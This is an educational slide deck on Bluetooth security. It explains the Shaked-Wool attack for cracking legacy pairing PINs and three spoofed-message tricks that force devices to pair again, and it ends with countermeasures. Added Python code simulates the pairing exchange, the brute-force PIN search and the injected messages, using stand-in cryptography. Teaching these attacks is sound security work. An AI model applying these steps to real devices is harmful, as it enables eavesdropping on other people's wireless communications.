Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Cracking the PIN and the re-pairing attack on Bluetooth devices, explained in a simple manner. Suitable for beginners as well as experts in the fields of cyber security and Bluetooth technology.

Page 1: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

By Rajeev Chauhan

http://www.cysectips.blogspot.in
https://www.facebook.com/cyberoxen
http://cyberoxen.com

Bluetooth Security

Step by Step Analysis

cyberoxen

Page 2: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Bluetooth Security

● Depends on pairing codes (PINs) to establish BT communication.

● PIN cracked... aim achieved.

● Source: "Cracking the Bluetooth PIN" by Yaniv Shaked and Avishai Wool (MobiSys 2005).

Page 3: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Bluetooth Connectivity

● Basic trivia:

– PIN: Personal Identification Number.

● The PIN code is 1-16 bytes long (8-128 bits).
● Most devices use a PIN of 4 decimal digits.

– BD_ADDR: each Bluetooth device has a unique 48-bit address called the Bluetooth Device Address.

– Pairing: the process in which two (or more) Bluetooth devices hook up to create a shared secret. The first such secret is the initialization key K_init; it is used to derive the link key K_ab, which forms the basis for all future Bluetooth negotiations between these two devices.

Page 4: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

[Cartoon: men, women, Bluetooth and Wi-Fi. Image ref: http://www.hudo.com/joke/men-women-bluetooth-and-wi-fi/]

Page 5: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Bluetooth Pairing and Authentication

● It involves:
– Creation of the initialization key (K_init).
– Creation of the link key (K_ab).
– Authentication.
– Derivation of the encryption key for communication.

Page 6: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Creation of K_init

The K_init key is created using the E22 algorithm, whose inputs are:

● BD_ADDR.
● The PIN code and its length.
● A 128-bit random number IN_RAND (transmitted in plaintext).

● This algorithm outputs a 128-bit word, which is referred to as the initialization key (K_init).

Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

Page 7: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Creation of K_ab

● Using the E21 algorithm, both devices create the link key K_ab. The inputs of E21 are:
1. A BD_ADDR.
2. A 128-bit random number LK_RAND.

● The devices use the initialization key to exchange two new 128-bit random words, known as LK_RAND_A and LK_RAND_B.

● Each device selects a random 128-bit word and sends it to the other device after bitwise XOR-ing it with K_init. Each side then computes E21 over (its own LK_RAND, its own BD_ADDR); the link key K_ab is the XOR of the two E21 outputs, so both devices arrive at the same K_ab.

Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

Page 8: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Mutual Authentication

● This process is based on a challenge-response scheme.

● One of the devices, the verifier, generates a random 128-bit word called AU_RAND_A and sends it (in plaintext) to the other device, the claimant.

● The claimant calculates a 32-bit word called SRES using the algorithm E1. The inputs to E1 are:
1. The random word AU_RAND_A.
2. The link key K_ab.
3. The claimant's own Bluetooth device address (BD_ADDR_B).

● The claimant sends the 32-bit SRES word as a reply to the verifier, who verifies the response by performing the same calculation.

● This process is done at both ends: the roles are then swapped and the other device sends its own challenge AU_RAND_B.

● As a side effect of the authentication process, a 96-bit word called ACO is calculated by both peers; it is used during the creation of the encryption key.

Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

Page 9: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Bluetooth PIN Cracking

● Messages sent during the pairing and authentication process (figure: the seven over-the-air messages, numbered 1-7, that the next slide refers to).

Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

Page 10: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Bluetooth PIN Cracking

● The attacker eavesdrops on the complete pairing and authentication process and records all messages.

● The attacker then enumerates all possible values of the PIN.

● For each guess, the attacker runs E22 with inputs IN_RAND (message 1), the BD_ADDR and the guessed PIN, obtaining a hypothesis for K_init, which is used to decode messages 2 and 3.

● Messages 2 and 3 contain enough information to give the attacker a hypothesis for K_ab.

● Using the hypothesised K_ab and the transmitted AU_RAND_A (message 4), the attacker calculates SRES and compares it to the data of message 5.

● The attacker uses the values of messages 6 and 7 to re-verify the K_ab hypothesis; the search continues until the correct PIN is found.

Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

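The pairing flow of slides 6 to 8 and the search of slide 10, as an added example in Python that is not part of the original slides or of Shaked and Wool's paper. The real E22, E21 and E1 are built on SAFER+; here an HMAC-SHA256 stand-in (an assumption, not the real functions) keeps their input and output widths so that the seven messages can be generated and the offline search run end to end. The device addresses and the PIN are constructed, the function names `pair_and_authenticate`, `crack_pin` and `demo` are hypothetical, and the choice of which BD_ADDR feeds E22 is also an assumption; the attacker sniffs both addresses, so it does not change the search.

```python
import hashlib
import hmac
import secrets
from typing import Dict, List, Tuple

# Stand-in for the SAFER+-based Bluetooth functions. Assumption: this is NOT the
# real E22/E21/E1; it only preserves their shapes (128-bit keys, 32-bit SRES,
# 96-bit ACO) so the message flow and the offline search can be run.
def _prf(tag: bytes, *parts: bytes, n: int) -> bytes:
    return hmac.new(tag, b"".join(parts), hashlib.sha256).digest()[:n]

def e22(bd_addr: bytes, pin: bytes, in_rand: bytes) -> bytes:
    """K_init = E22(BD_ADDR, PIN, len(PIN), IN_RAND): 128-bit initialization key."""
    return _prf(b"E22", bd_addr, pin, bytes([len(pin)]), in_rand, n=16)

def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """Per-device contribution to the link key: E21(LK_RAND, BD_ADDR)."""
    return _prf(b"E21", lk_rand, bd_addr, n=16)

def e1(k_ab: bytes, au_rand: bytes, claimant_addr: bytes) -> Tuple[bytes, bytes]:
    """E1(K_ab, AU_RAND, BD_ADDR of the claimant) -> (32-bit SRES, 96-bit ACO)."""
    out = _prf(b"E1", k_ab, au_rand, claimant_addr, n=16)
    return out[:4], out[4:]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def pair_and_authenticate(addr_a: bytes, addr_b: bytes, pin: bytes) -> Tuple[Dict[str, bytes], bytes]:
    """Legacy pairing plus mutual authentication between master A and slave B.
    Returns the seven over-the-air messages of slides 9/10 and the real K_ab."""
    in_rand = secrets.token_bytes(16)                    # msg 1, A->B, plaintext
    # Assumption: the slave's address is fed to E22; the eavesdropper knows both
    # addresses, so this choice does not affect the attack.
    k_init = e22(addr_b, pin, in_rand)
    lk_rand_a, lk_rand_b = secrets.token_bytes(16), secrets.token_bytes(16)
    msg2 = xor(lk_rand_a, k_init)                        # msg 2, A->B
    msg3 = xor(lk_rand_b, k_init)                        # msg 3, B->A
    k_ab = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
    au_rand_a = secrets.token_bytes(16)                  # msg 4, A->B (A verifies B)
    sres_b, _aco = e1(k_ab, au_rand_a, addr_b)           # msg 5, B->A
    au_rand_b = secrets.token_bytes(16)                  # msg 6, B->A (B verifies A)
    sres_a, _aco = e1(k_ab, au_rand_b, addr_a)           # msg 7, A->B
    transcript = {"in_rand": in_rand, "msg2": msg2, "msg3": msg3,
                  "au_rand_a": au_rand_a, "sres_b": sres_b,
                  "au_rand_b": au_rand_b, "sres_a": sres_a}
    return transcript, k_ab

def crack_pin(addr_a: bytes, addr_b: bytes, t: Dict[str, bytes], max_digits: int = 4) -> List[Tuple[bytes, bytes]]:
    """Slide 10's offline search: for every decimal PIN, rebuild K_init, unmask
    messages 2/3 to get a K_ab hypothesis, check it against SRES in message 5,
    then re-verify against messages 6/7. Returns every (pin, K_ab) survivor."""
    survivors = []
    for ndigits in range(1, max_digits + 1):
        for value in range(10 ** ndigits):
            pin = str(value).zfill(ndigits).encode()
            k_init = e22(addr_b, pin, t["in_rand"])
            lk_rand_a = xor(t["msg2"], k_init)
            lk_rand_b = xor(t["msg3"], k_init)
            k_ab = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
            if e1(k_ab, t["au_rand_a"], addr_b)[0] != t["sres_b"]:
                continue                                 # first 32-bit filter (msg 5)
            if e1(k_ab, t["au_rand_b"], addr_a)[0] != t["sres_a"]:
                continue                                 # second 32-bit filter (msg 7)
            survivors.append((pin, k_ab))
    return survivors

def demo(pin: bytes = b"1234") -> Tuple[List[Tuple[bytes, bytes]], bytes]:
    """Constructed addresses (not real devices); returns the survivors and the real K_ab."""
    addr_a = bytes.fromhex("001122334455")
    addr_b = bytes.fromhex("66778899aabb")
    transcript, real_k_ab = pair_and_authenticate(addr_a, addr_b, pin)
    return crack_pin(addr_a, addr_b, transcript), real_k_ab

if __name__ == "__main__":
    found, real_k_ab = demo()
    for pin, k_ab in found:
        print(f"PIN {pin.decode()} -> K_ab {k_ab.hex()} (matches real key: {k_ab == real_k_ab})")
```

The search is filtered twice: a wrong PIN survives message 5 with probability about 2^-32 and messages 6/7 with another 2^-32, which is the 64-bit bound slide 12 refers to. The attacker never needs the devices to do anything; every value used above is either sniffed or guessed.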
Page 11: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Brute Force Algorithm

(Figure: pseudocode of the brute-force search.) Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

Page 12: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Bluetooth PIN Cracking

● The attack is only fully successful against PIN values of under 64 bits.

● If the PIN is longer, then with high probability there will be multiple PIN candidates, since the two SRES values only provide 64 bits of data.

● A 64-bit PIN is equivalent to a 19-decimal-digit PIN.

● The Bluetooth pairing and authentication process uses three algorithms: E22, E21, E1.

● All of these algorithms are based on the SAFER+ block cipher.

Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

Page 13: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

The Re-Pairing Attack

● Assumptions:
– Both devices have already been paired once, and the pairing process completed.
– The link key K_ab is stored in each device, so on the next connection the devices skip pairing and proceed directly to the authentication phase.
– The attacker wants to record all the pairing messages and crack the PIN using the basic attack, so the attacker must force the devices to repeat the pairing process.
– The Bluetooth specification allows a Bluetooth device to forget a link key and re-pair.

Page 14: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

The Re-Pairing Attack

● Three different approaches.

● First method:
– The master device sends the slave an AU_RAND message and expects the SRES message in return.
– (If the slave has forgotten the link key, it sends an "LMP_not_accepted" message in return to let the master know.)
– The attacker injects an LMP_not_accepted message toward the master, spoofing the slave. This makes the master re-initiate the pairing.
– Restarting the pairing procedure causes the master to discard the link key.

Page 15: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

The Re-Pairing Attack

● Second method:
– Before the master device sends the slave an AU_RAND message, the attacker injects an IN_RAND message toward the slave, spoofing the master.
– The slave device is convinced the master has lost the link key, and pairing is restarted.
– This causes the connection establishment to restart.

Page 16: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

The Re-Pairing Attack

● Third method:
– After the master has sent the AU_RAND, the attacker injects a random SRES message toward the master.
– This causes the authentication phase to restart, and repeated attempts will be made.
– At some point, after a certain number of failed authentication attempts, the master device is expected to declare that the authentication procedure has failed and initiate pairing.

Page 17: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

The Re-Pairing Attack

● Culmination:
– Each of the three methods ensures the pairing process will occur during the next connection establishment, so the attacker can eavesdrop on the entire process and use the basic method to crack the PIN.
– After breaking the PIN (0.06-0.3 s for a 4-digit PIN), the attacker can decode the saved messages and continue to eavesdrop on and decode the communication on the fly.
– Since Bluetooth supports a bit rate of 1 Mbit/s, a 40 KB buffer is more than enough to hold the traffic captured while the PIN is being cracked, for the common case of a 4-digit PIN.

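The three re-pairing triggers of slides 14 to 16, as an added Python model that is not from the slides, the paper, or any Bluetooth stack. `Pdu`, `Master` and `Slave` are hypothetical classes that keep only the link-key state and the LMP opcodes the slides mention; E1 is replaced by a truncated HMAC-SHA256 stand-in, the number of failed authentications a master tolerates before re-pairing is set to 3 as an assumption (the slides only say "a certain number"), and the stored link key is constructed. The point the model makes is that none of the injected PDUs needs the link key: pre-authentication LMP traffic is unauthenticated, so one spoofed PDU resets the security state.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import List, Optional

LINK_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed K_ab

@dataclass
class Pdu:
    """One LMP PDU on the air. Assumption: only sender, opcode and payload are
    modelled; real LMP framing, timing and the SAFER+ E1 are not reproduced."""
    sender: str
    opcode: str      # LMP_au_rand | LMP_sres | LMP_not_accepted | LMP_in_rand
    payload: bytes = b""

def sres_for(link_key: bytes, au_rand: bytes) -> bytes:
    """Stand-in for E1 (HMAC-SHA256 truncated to the 32-bit SRES width)."""
    return hmac.new(link_key, au_rand, hashlib.sha256).digest()[:4]

@dataclass
class Master:
    link_key: Optional[bytes]
    max_auth_failures: int = 3      # assumption: the count is device-specific
    state: str = "IDLE"
    failures: int = 0
    pairing_restarted: bool = False
    expected_sres: bytes = b""
    sent: List[Pdu] = field(default_factory=list)

    def connect(self) -> None:
        if self.link_key is None:
            self._restart_pairing()
        else:
            self._challenge()          # stored key: skip pairing, authenticate

    def _challenge(self) -> None:
        au_rand = secrets.token_bytes(16)                  # AU_RAND, sent in plaintext
        self.expected_sres = sres_for(self.link_key, au_rand)
        self.state = "AWAIT_SRES"
        self.sent.append(Pdu("master", "LMP_au_rand", au_rand))

    def _restart_pairing(self) -> None:
        self.link_key = None                               # stored key discarded
        self.pairing_restarted = True
        self.state = "PAIRING"
        self.sent.append(Pdu("master", "LMP_in_rand", secrets.token_bytes(16)))

    def receive(self, pdu: Pdu) -> None:
        # Nothing here can check who really sent the PDU: before authentication
        # completes, LMP traffic is neither authenticated nor encrypted.
        if self.state != "AWAIT_SRES":
            return
        if pdu.opcode == "LMP_not_accepted":               # method 1
            self._restart_pairing()
        elif pdu.opcode == "LMP_sres":
            if hmac.compare_digest(pdu.payload, self.expected_sres):
                self.state = "AUTHENTICATED"
            else:                                          # method 3
                self.failures += 1
                if self.failures >= self.max_auth_failures:
                    self._restart_pairing()
                else:
                    self._challenge()                      # retry with a fresh AU_RAND

@dataclass
class Slave:
    link_key: Optional[bytes]
    pairing_restarted: bool = False

    def receive(self, pdu: Pdu) -> None:
        if pdu.opcode == "LMP_in_rand":                    # method 2
            self.link_key = None          # reads IN_RAND as "master lost the key"
            self.pairing_restarted = True

def legitimate_session() -> bool:
    """Control case: the real slave answers with the right SRES, no re-pairing."""
    m, s = Master(LINK_KEY), Slave(LINK_KEY)
    m.connect()
    au_rand = m.sent[-1].payload
    m.receive(Pdu("slave", "LMP_sres", sres_for(s.link_key, au_rand)))
    return m.state == "AUTHENTICATED" and not m.pairing_restarted

def method_1_not_accepted() -> bool:
    m = Master(LINK_KEY)
    m.connect()
    m.receive(Pdu("attacker", "LMP_not_accepted"))        # spoofed as the slave
    return m.pairing_restarted and m.link_key is None

def method_2_in_rand() -> bool:
    s = Slave(LINK_KEY)
    s.receive(Pdu("attacker", "LMP_in_rand", secrets.token_bytes(16)))  # spoofed as the master
    return s.pairing_restarted

def method_3_bogus_sres() -> int:
    """Returns how many bogus SRES replies it took before the master re-paired."""
    m = Master(LINK_KEY)
    m.connect()
    while not m.pairing_restarted:
        m.receive(Pdu("attacker", "LMP_sres", secrets.token_bytes(4)))
    return m.failures
```

In every attacker path the injected payload is either empty or random; the only thing the attacker needs is to be on the air at the right moment. Once `pairing_restarted` is true, the next connection carries the full seven-message pairing transcript that the basic attack consumes.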
Page 18: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Countermeasures

● Refrain from entering the PIN into the Bluetooth device for pairing as much as possible; every pairing is an opportunity for an eavesdropper.

● Use a PIN longer than 6 digits.

● The PIN length ranges from 8 to 128 bits; devices should ask for longer PINs.

● Set the Bluetooth device to "non-discoverable / hidden mode".

● Use application-level security in addition to BT authentication, i.e. a password.

Page 19: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

Countermeasures

● Use the strongest Bluetooth security mode available on the device.

● Avoid use of standard commercial Bluetooth headsets.

● Disable Bluetooth functionality when not in use. Use shorter-range Class 2 or 3 devices.

● Make devices discoverable only when necessary.

● Pair Bluetooth devices in a secure area using long and randomly generated passkeys.

● Never enter passkeys when unexpectedly prompted for them. Maintain physical control of devices at all times.

● Remove lost or stolen devices from paired device lists.

● Use device firewalls, regularly patch Bluetooth devices, and keep device anti-virus software up to date.

Page 20: Bluetooth Hacking: Cracking the PIN and Re-Pairing Attack

INFORMATION SOURCES

● http://www.mysecurecyberspace.com/encyclopedia/index/pin-cracking.html

● http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/

● https://www.sans.org/reading-room/whitepapers/wireless/bluetooth-inherent-security-issues-945

● http://pervasive.cs.uah.edu/PSP/BluetoothSecurity

● http://www.techradar.com/news/networking/bluetooth-jumps-to-4-1-makes-an-early-leap-for-the-internet-of-things-1204915
